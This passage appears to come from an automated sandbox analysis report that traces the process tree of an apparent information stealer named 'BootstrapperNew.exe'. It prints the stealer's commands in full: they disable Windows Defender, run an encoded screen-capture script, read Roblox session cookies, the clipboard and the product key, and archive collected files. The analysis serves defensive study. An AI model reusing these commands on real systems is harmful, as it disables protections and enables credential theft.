BootstrapperNew.exe 106 PID 1032 wrote to memory of 1096 1032 BootstrapperNew.exe 106 PID 2836 wrote to memory of 2792 2836 cmd.exe 107 PID 2836 wrote to memory of 2792 2836 cmd.exe 107 PID 1032 wrote to memory of 748 1032 BootstrapperNew.exe 109 PID 1032 wrote to memory of 748 1032 BootstrapperNew.exe 109 PID 1032 wrote to memory of 2788 1032 BootstrapperNew.exe 110 PID 1032 wrote to memory of 2788 1032 BootstrapperNew.exe 110 PID 1032 wrote to memory of 4868 1032 BootstrapperNew.exe 112 PID 1032 wrote to memory of 4868 1032 BootstrapperNew.exe 112 PID 1032 wrote to memory of 4140 1032 BootstrapperNew.exe 114 PID 1032 wrote to memory of 4140 1032 BootstrapperNew.exe 114 PID 1032 wrote to memory of 1676 1032 BootstrapperNew.exe 115 PID 1032 wrote to memory of 1676 1032 BootstrapperNew.exe 115 PID 2740 wrote to memory of 1860 2740 cmd.exe 164 PID 2740 wrote to memory of 1860 2740 cmd.exe 164 PID 5012 wrote to memory of 3544 5012 cmd.exe 121 PID 5012 wrote to memory of 3544 5012 cmd.exe 121 PID 1096 wrote to memory of 2344 1096 cmd.exe 122 PID 1096 wrote to memory of 2344 1096 cmd.exe 122 PID 748 wrote to memory of 3216 748 cmd.exe 123 PID 748 wrote to memory of 3216 748 cmd.exe 123 PID 1676 wrote to memory of 2900 1676 cmd.exe 124 PID 1676 wrote to memory of 2900 1676 cmd.exe 124 PID 4868 wrote to memory of 2340 4868 cmd.exe 125 PID 4868 wrote to memory of 2340 4868 cmd.exe 125 PID 2788 wrote to memory of 4432 2788 cmd.exe 126 PID 2788 wrote to memory of 4432 2788 cmd.exe 126 PID 4140 wrote to memory of 2264 4140 cmd.exe 154 PID 4140 wrote to memory of 2264 4140 cmd.exe 154 PID 1032 wrote to memory of 1328 1032 BootstrapperNew.exe 129 PID 1032 wrote to memory of 1328 1032 BootstrapperNew.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2648 attrib.exe 1576 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
PID:2336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2900 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2xlvyzco\2xlvyzco.cmdline"5⤵PID:2812
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF5A.tmp" "c:\Users\Admin\AppData\Local\Temp\2xlvyzco\CSCC68F111E802649489315FAD4C724012.TMP"6⤵PID:3196
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1328
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3864
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:2912
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3028
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4944
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3628
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4616
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1344
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:2760
-
C:\Windows\system32\getmac.exegetmac4⤵PID:3864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:1228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\fb27j.zip" *"3⤵PID:440
-
C:\Users\Admin\AppData\Local\Temp\_MEI36162\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI36162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\fb27j.zip" *4⤵
- Executes dropped EXE
PID:668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:4900
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:3156
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:632
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:3548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:4292
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:1248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:2552
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1016
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:1676
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4084 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1916 -prefsLen 27448 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f27ef65-e11b-4082-92da-390f603d904d} 4084 "\\.\pipe\gecko-crash-server-pipe.4084" gpu3⤵PID:3932
-
-
